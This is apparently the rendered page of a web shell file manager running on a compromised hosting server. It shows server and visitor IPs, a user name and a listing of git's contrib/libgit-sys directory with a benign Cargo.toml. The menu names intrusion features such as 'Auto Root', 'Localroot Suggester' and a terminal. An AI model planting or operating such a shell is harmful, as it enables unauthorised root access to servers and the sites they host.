Linux evo.fastest-server.com 5.14.0-284.1101.el9.tuxcare.11.els11.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Aug 14 13:30:35 UTC 2026 x86_64
LiteSpeed
Server IP : 103.249.112.113 & Your IP : 216.73.217.135
Domains : 988 Domain
User : tanishks
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
doc /
git /
contrib /
libgit-sys /
Delete
Unzip
Name
Size
Permission
Date
Action
src
[ DIR ]
drwxr-xr-x
2026-09-04 11:33
Cargo.lock
1.78
KB
-rw-r--r--
2025-11-17 16:38
Cargo.toml
493
B
-rw-r--r--
2025-11-17 16:38
README.md
97
B
-rw-r--r--
2025-11-17 16:38
build.rs
1.14
KB
-rw-r--r--
2025-11-17 16:38
public_symbol_export.c
1.31
KB
-rw-r--r--
2025-11-17 16:38
public_symbol_export.h
568
B
-rw-r--r--
2025-11-17 16:38
Save
Rename
[package] name = "libgit-sys" version = "0.1.0" edition = "2021" build = "build.rs" links = "gitpub" rust-version = "1.63" # TODO: Once we hit 1.84 or newer, we may want to remove Cargo.lock from # version control. See https://lore.kernel.org/git/Z47jgK-oMjFRSslr@tapette.crustytoothpaste.net/ description = "Native bindings to a portion of libgit" [lib] path = "src/lib.rs" [dependencies] libz-sys = "1.1.19" [build-dependencies] autocfg = "1.4.0" make-cmd = "0.1.0"